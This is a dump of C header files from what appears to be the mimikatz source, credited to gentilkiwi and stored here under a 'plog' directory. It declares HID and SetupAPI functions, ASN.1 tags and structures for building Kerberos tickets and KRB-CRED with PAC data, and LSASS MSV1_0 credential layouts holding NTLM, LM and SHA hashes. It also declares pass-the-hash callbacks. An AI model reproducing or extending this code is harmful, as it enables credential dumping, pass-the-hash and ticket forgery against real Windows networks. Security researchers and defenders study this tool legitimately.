ULONG ReportBufferLength); 50 | extern BOOLEAN __stdcall HidD_GetFeature(__in HANDLE HidDeviceObject, __out PVOID ReportBuffer, __in ULONG ReportBufferLength); 51 | #include 52 | 53 | #if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64 54 | #include // Assume 8-byte (64-bit) packing throughout 55 | #elif defined(_M_IX86) 56 | #include // Assume byte packing throughout (32-bit processor) 57 | #endif 58 | #define DIGCF_DEFAULT 0x00000001 // only valid with DIGCF_DEVICEINTERFACE 59 | #define DIGCF_PRESENT 0x00000002 60 | #define DIGCF_ALLCLASSES 0x00000004 61 | #define DIGCF_PROFILE 0x00000008 62 | #define DIGCF_DEVICEINTERFACE 0x00000010 63 | 64 | #define WINSETUPAPI DECLSPEC_IMPORT 65 | typedef PVOID HDEVINFO; 66 | 67 | typedef struct _SP_DEVINFO_DATA { 68 | DWORD cbSize; 69 | GUID ClassGuid; 70 | DWORD DevInst; // DEVINST handle 71 | ULONG_PTR Reserved; 72 | } SP_DEVINFO_DATA, *PSP_DEVINFO_DATA; 73 | 74 | typedef struct _SP_DEVICE_INTERFACE_DATA { 75 | DWORD cbSize; 76 | GUID InterfaceClassGuid; 77 | DWORD Flags; 78 | ULONG_PTR Reserved; 79 | } SP_DEVICE_INTERFACE_DATA, *PSP_DEVICE_INTERFACE_DATA; 80 | 81 | typedef struct _SP_DEVICE_INTERFACE_DETAIL_DATA_W { 82 | DWORD cbSize; 83 | WCHAR DevicePath[ANYSIZE_ARRAY]; 84 | } SP_DEVICE_INTERFACE_DETAIL_DATA_W, *PSP_DEVICE_INTERFACE_DETAIL_DATA_W, SP_DEVICE_INTERFACE_DETAIL_DATA, *PSP_DEVICE_INTERFACE_DETAIL_DATA; 85 | 86 | extern WINSETUPAPI HDEVINFO WINAPI SetupDiGetClassDevsW(__in_opt CONST GUID *ClassGuid, __in_opt PCWSTR Enumerator, __in_opt HWND hwndParent, __in DWORD Flags); 87 | extern WINSETUPAPI BOOL WINAPI SetupDiEnumDeviceInterfaces(__in HDEVINFO DeviceInfoSet, __in_opt PSP_DEVINFO_DATA DeviceInfoData, __in CONST GUID *InterfaceClassGuid, __in DWORD MemberIndex, __out PSP_DEVICE_INTERFACE_DATA DeviceInterfaceData); 88 | extern WINSETUPAPI BOOL WINAPI SetupDiGetDeviceInterfaceDetailW( __in HDEVINFO DeviceInfoSet, __in PSP_DEVICE_INTERFACE_DATA DeviceInterfaceData, __out_bcount_opt(DeviceInterfaceDetailDataSize) PSP_DEVICE_INTERFACE_DETAIL_DATA_W DeviceInterfaceDetailData, __in DWORD DeviceInterfaceDetailDataSize, __out_opt PDWORD RequiredSize, __out_opt PSP_DEVINFO_DATA DeviceInfoData); 89 | extern WINSETUPAPI BOOL WINAPI SetupDiDestroyDeviceInfoList(__in HDEVINFO DeviceInfoSet); 90 | extern WINSETUPAPI BOOL SetupDiGetDeviceRegistryPropertyW(__in HDEVINFO DeviceInfoSet, __in PSP_DEVINFO_DATA DeviceInfoData, __in DWORD Property, __out_opt PDWORD PropertyRegDataType, __out_opt PBYTE PropertyBuffer, __in DWORD PropertyBufferSize, __out_opt PDWORD RequiredSize); 91 | extern WINSETUPAPI BOOL SetupDiEnumDeviceInfo(__in HDEVINFO DeviceInfoSet, __in DWORD MemberIndex, __out PSP_DEVINFO_DATA DeviceInfoData); 92 | 93 | #define SetupDiGetClassDevs SetupDiGetClassDevsW 94 | #define SetupDiGetDeviceInterfaceDetail SetupDiGetDeviceInterfaceDetailW 95 | #define SetupDiGetDeviceRegistryProperty SetupDiGetDeviceRegistryPropertyW 96 | #include -------------------------------------------------------------------------------- /plog/modules/kerberos/kuhl_m_kerberos_ticket.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "../kuhl_m.h" 8 | #include "../modules/kull_m_asn1.h" 9 | 10 | #define ID_APP_TICKET 1 11 | #define ID_CTX_TICKET_TKT_VNO 0 12 | #define ID_CTX_TICKET_REALM 1 13 | #define ID_CTX_TICKET_SNAME 2 14 | #define ID_CTX_TICKET_ENC_PART 3 15 | 16 | #define ID_APP_ENCTICKETPART 3 17 | #define ID_CTX_ENCTICKETPART_FLAGS 0 18 | #define ID_CTX_ENCTICKETPART_KEY 1 19 | #define ID_CTX_ENCTICKETPART_CREALM 2 20 | #define ID_CTX_ENCTICKETPART_CNAME 3 21 | #define ID_CTX_ENCTICKETPART_TRANSITED 4 22 | #define ID_CTX_ENCTICKETPART_AUTHTIME 5 23 | #define ID_CTX_ENCTICKETPART_STARTTIME 6 24 | #define ID_CTX_ENCTICKETPART_ENDTIME 7 25 | #define ID_CTX_ENCTICKETPART_RENEW_TILL 8 26 | #define ID_CTX_ENCTICKETPART_CADDR 9 27 | #define ID_CTX_ENCTICKETPART_AUTHORIZATION_DATA 10 28 | 29 | #define ID_APP_KRB_CRED 22 30 | #define ID_CTX_KRB_CRED_PVNO 0 31 | #define ID_CTX_KRB_CRED_MSG_TYPE 1 32 | #define ID_CTX_KRB_CRED_TICKETS 2 33 | #define ID_CTX_KRB_CRED_ENC_PART 3 34 | 35 | #define ID_APP_ENCKRBCREDPART 29 36 | #define ID_CTX_ENCKRBCREDPART_TICKET_INFO 0 37 | #define ID_CTX_ENCKRBCREDPART_NONCE 1 38 | #define ID_CTX_ENCKRBCREDPART_TIMESTAMP 2 39 | #define ID_CTX_ENCKRBCREDPART_USEC 3 40 | #define ID_CTX_ENCKRBCREDPART_S_ADDRESS 4 41 | #define ID_CTX_ENCKRBCREDPART_R_ADDRESS 5 42 | 43 | #define ID_CTX_KRBCREDINFO_KEY 0 44 | #define ID_CTX_KRBCREDINFO_PREALM 1 45 | #define ID_CTX_KRBCREDINFO_PNAME 2 46 | #define ID_CTX_KRBCREDINFO_FLAGS 3 47 | #define ID_CTX_KRBCREDINFO_AUTHTIME 4 48 | #define ID_CTX_KRBCREDINFO_STARTTIME 5 49 | #define ID_CTX_KRBCREDINFO_ENDTIME 6 50 | #define ID_CTX_KRBCREDINFO_RENEW_TILL 7 51 | #define ID_CTX_KRBCREDINFO_SREAL 8 52 | #define ID_CTX_KRBCREDINFO_SNAME 9 53 | #define ID_CTX_KRBCREDINFO_CADDR 10 54 | 55 | #define ID_CTX_PRINCIPALNAME_NAME_TYPE 0 56 | #define ID_CTX_PRINCIPALNAME_NAME_STRING 1 57 | 58 | #define ID_CTX_ENCRYPTIONKEY_KEYTYPE 0 59 | #define ID_CTX_ENCRYPTIONKEY_KEYVALUE 1 60 | 61 | #define ID_CTX_ENCRYPTEDDATA_ETYPE 0 62 | #define ID_CTX_ENCRYPTEDDATA_KVNO 1 63 | #define ID_CTX_ENCRYPTEDDATA_CIPHER 2 64 | 65 | #define ID_CTX_TRANSITEDENCODING_TR_TYPE 0 66 | #define ID_CTX_TRANSITEDENCODING_CONTENTS 1 67 | 68 | #define ID_CTX_AUTHORIZATIONDATA_AD_TYPE 0 69 | #define ID_CTX_AUTHORIZATIONDATA_AD_DATA 1 70 | 71 | #define ID_AUTHDATA_AD_IF_RELEVANT 1 72 | #define ID_AUTHDATA_AD_WIN2K_PAC 128 73 | 74 | typedef struct _KIWI_KERBEROS_BUFFER { 75 | ULONG Length; 76 | PUCHAR Value; 77 | } KIWI_KERBEROS_BUFFER, *PKIWI_KERBEROS_BUFFER; 78 | 79 | typedef struct _KIWI_KERBEROS_TICKET { 80 | PKERB_EXTERNAL_NAME ServiceName; 81 | LSA_UNICODE_STRING DomainName; 82 | PKERB_EXTERNAL_NAME TargetName; 83 | LSA_UNICODE_STRING TargetDomainName; 84 | PKERB_EXTERNAL_NAME ClientName; 85 | LSA_UNICODE_STRING AltTargetDomainName; 86 | 87 | LSA_UNICODE_STRING Description; 88 | 89 | FILETIME StartTime; 90 | FILETIME EndTime; 91 | FILETIME RenewUntil; 92 | 93 | LONG KeyType; 94 | KIWI_KERBEROS_BUFFER Key; 95 | 96 | ULONG TicketFlags; 97 | LONG TicketEncType; 98 | ULONG TicketKvno; 99 | KIWI_KERBEROS_BUFFER Ticket; 100 | } KIWI_KERBEROS_TICKET, *PKIWI_KERBEROS_TICKET; 101 | 102 | void kuhl_m_kerberos_ticket_display(PKIWI_KERBEROS_TICKET ticket, BOOL withKey, BOOL encodedTicketToo); 103 | void kuhl_m_kerberos_ticket_displayFlags(ULONG flags); 104 | void kuhl_m_kerberos_ticket_displayExternalName(IN LPCWSTR prefix, IN PKERB_EXTERNAL_NAME pExternalName, IN PUNICODE_STRING pDomain); 105 | BOOL kuhl_m_kerberos_ticket_isLongFilename(PKIWI_KERBEROS_TICKET ticket); 106 | PCWCHAR kuhl_m_kerberos_ticket_etype(LONG eType); 107 | PCWCHAR kuhl_m_kerberos_ticket_ctype(LONG cType); 108 | 109 | void kuhl_m_kerberos_ticket_freeTicket(PKIWI_KERBEROS_TICKET ticket); 110 | PKERB_EXTERNAL_NAME kuhl_m_kerberos_ticket_copyExternalName(PKERB_EXTERNAL_NAME pName); 111 | void kuhl_m_kerberos_ticket_freeExternalName(PKERB_EXTERNAL_NAME pName); 112 | void kuhl_m_kerberos_ticket_freeKiwiKerberosBuffer(PKIWI_KERBEROS_BUFFER pBuffer); 113 | 114 | PBERVAL kuhl_m_kerberos_ticket_createAppKrbCred(PKIWI_KERBEROS_TICKET ticket, BOOL valueIsTicket); 115 | PBERVAL kuhl_m_kerberos_ticket_createAppEncTicketPart(PKIWI_KERBEROS_TICKET ticket, LPCVOID PacAuthData, DWORD PacAuthDataSize); 116 | 117 | void kuhl_m_kerberos_ticket_createSequenceEncryptedData(BerElement * pBer, LONG eType, ULONG kvNo, LPCVOID data, DWORD size); 118 | void kuhl_m_kerberos_ticket_createSequenceEncryptionKey(BerElement * pBer, LONG eType, LPCVOID data, DWORD size); 119 | void kuhl_m_kerberos_ticket_createSequencePrimaryName(BerElement * pBer, PKERB_EXTERNAL_NAME name); -------------------------------------------------------------------------------- /plog/modules/sekurlsa/packages/kuhl_m_sekurlsa_msv1_0.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "../kuhl_m_sekurlsa.h" 8 | #include "../kuhl_m_sekurlsa_utils.h" 9 | #include "../modules/kull_m_crypto_system.h" 10 | #include "../modules/rpc/kull_m_rpc_ms-credentialkeys.h" 11 | 12 | typedef struct _MSV1_0_PRIMARY_CREDENTIAL { 13 | LSA_UNICODE_STRING LogonDomainName; 14 | LSA_UNICODE_STRING UserName; 15 | BYTE NtOwfPassword[LM_NTLM_HASH_LENGTH]; 16 | BYTE LmOwfPassword[LM_NTLM_HASH_LENGTH]; 17 | BYTE ShaOwPassword[SHA_DIGEST_LENGTH]; 18 | BOOLEAN isNtOwfPassword; 19 | BOOLEAN isLmOwfPassword; 20 | BOOLEAN isShaOwPassword; 21 | /* buffer */ 22 | } MSV1_0_PRIMARY_CREDENTIAL, *PMSV1_0_PRIMARY_CREDENTIAL; 23 | 24 | typedef struct _MSV1_0_PRIMARY_CREDENTIAL_10_OLD { 25 | LSA_UNICODE_STRING LogonDomainName; 26 | LSA_UNICODE_STRING UserName; 27 | BOOLEAN isIso; 28 | BOOLEAN isNtOwfPassword; 29 | BOOLEAN isLmOwfPassword; 30 | BOOLEAN isShaOwPassword; 31 | BYTE align0; 32 | BYTE align1; 33 | BYTE NtOwfPassword[LM_NTLM_HASH_LENGTH]; 34 | BYTE LmOwfPassword[LM_NTLM_HASH_LENGTH]; 35 | BYTE ShaOwPassword[SHA_DIGEST_LENGTH]; 36 | /* buffer */ 37 | } MSV1_0_PRIMARY_CREDENTIAL_10_OLD, *PMSV1_0_PRIMARY_CREDENTIAL_10_OLD; 38 | 39 | typedef struct _MSV1_0_PRIMARY_CREDENTIAL_10 { 40 | LSA_UNICODE_STRING LogonDomainName; 41 | LSA_UNICODE_STRING UserName; 42 | BOOLEAN isIso; 43 | BOOLEAN isNtOwfPassword; 44 | BOOLEAN isLmOwfPassword; 45 | BOOLEAN isShaOwPassword; 46 | BYTE align0; 47 | BYTE align1; 48 | BYTE align2; 49 | BYTE align3; 50 | BYTE NtOwfPassword[LM_NTLM_HASH_LENGTH]; 51 | BYTE LmOwfPassword[LM_NTLM_HASH_LENGTH]; 52 | BYTE ShaOwPassword[SHA_DIGEST_LENGTH]; 53 | /* buffer */ 54 | } MSV1_0_PRIMARY_CREDENTIAL_10, *PMSV1_0_PRIMARY_CREDENTIAL_10; 55 | 56 | typedef struct _MSV1_0_PRIMARY_CREDENTIAL_10_1607 { 57 | LSA_UNICODE_STRING LogonDomainName; 58 | LSA_UNICODE_STRING UserName; 59 | PVOID pNtlmCredIsoInProc; 60 | BOOLEAN isIso; 61 | BOOLEAN isNtOwfPassword; 62 | BOOLEAN isLmOwfPassword; 63 | BOOLEAN isShaOwPassword; 64 | BOOLEAN isDPAPIProtected; 65 | BYTE align0; 66 | BYTE align1; 67 | BYTE align2; 68 | DWORD unkD; // 1/2 69 | #pragma pack(push, 2) 70 | WORD isoSize; // 0000 71 | BYTE DPAPIProtected[LM_NTLM_HASH_LENGTH]; 72 | DWORD align3; // 00000000 73 | #pragma pack(pop) 74 | BYTE NtOwfPassword[LM_NTLM_HASH_LENGTH]; 75 | BYTE LmOwfPassword[LM_NTLM_HASH_LENGTH]; 76 | BYTE ShaOwPassword[SHA_DIGEST_LENGTH]; 77 | /* buffer */ 78 | } MSV1_0_PRIMARY_CREDENTIAL_10_1607, *PMSV1_0_PRIMARY_CREDENTIAL_10_1607; 79 | 80 | typedef struct _MSV1_0_PRIMARY_HELPER { 81 | LONG offsetToLogonDomain; 82 | LONG offsetToUserName; 83 | LONG offsetToisIso; 84 | LONG offsetToisNtOwfPassword; 85 | LONG offsetToisLmOwfPassword; 86 | LONG offsetToisShaOwPassword; 87 | LONG offsetToisDPAPIProtected; 88 | LONG offsetToNtOwfPassword; 89 | LONG offsetToLmOwfPassword; 90 | LONG offsetToShaOwPassword; 91 | LONG offsetToDPAPIProtected; 92 | LONG offsetToIso; 93 | } MSV1_0_PRIMARY_HELPER, *PMSV1_0_PRIMARY_HELPER; 94 | 95 | typedef struct _MSV1_0_PTH_DATA_CRED { 96 | PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pSecData; 97 | PSEKURLSA_PTH_DATA pthData; 98 | } MSV1_0_PTH_DATA_CRED, *PMSV1_0_PTH_DATA_CRED; 99 | 100 | typedef struct _MSV1_0_STD_DATA { 101 | PLUID LogonId; 102 | } MSV1_0_STD_DATA, *PMSV1_0_STD_DATA; 103 | 104 | typedef BOOL (CALLBACK * PKUHL_M_SEKURLSA_MSV_CRED_CALLBACK) (IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN struct _KIWI_MSV1_0_PRIMARY_CREDENTIALS * pCredentials, IN DWORD AuthenticationPackageId, IN PKULL_M_MEMORY_ADDRESS origBufferAddress, IN OPTIONAL LPVOID pOptionalData); 105 | 106 | KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_msv_package; 107 | NTSTATUS kuhl_m_sekurlsa_msv(int argc, wchar_t * argv[]); 108 | 109 | void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData); 110 | BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_msv_pth(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData); 111 | 112 | VOID kuhl_m_sekurlsa_msv_enum_cred(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PVOID pCredentials, IN PKUHL_M_SEKURLSA_MSV_CRED_CALLBACK credCallback, IN PVOID optionalData); 113 | BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_std(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN struct _KIWI_MSV1_0_PRIMARY_CREDENTIALS * pCredentials, IN DWORD AuthenticationPackageId, IN PKULL_M_MEMORY_ADDRESS origBufferAddress, IN OPTIONAL LPVOID pOptionalData); 114 | BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_pth(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN struct _KIWI_MSV1_0_PRIMARY_CREDENTIALS * pCredentials, IN DWORD AuthenticationPackageId, IN PKULL_M_MEMORY_ADDRESS origBufferAddress, IN OPTIONAL LPVOID pOptionalData); 115 | 116 | const MSV1_0_PRIMARY_HELPER * kuhl_m_sekurlsa_msv_helper(PKUHL_M_SEKURLSA_CONTEXT context); --------------------------------------------------------------------------------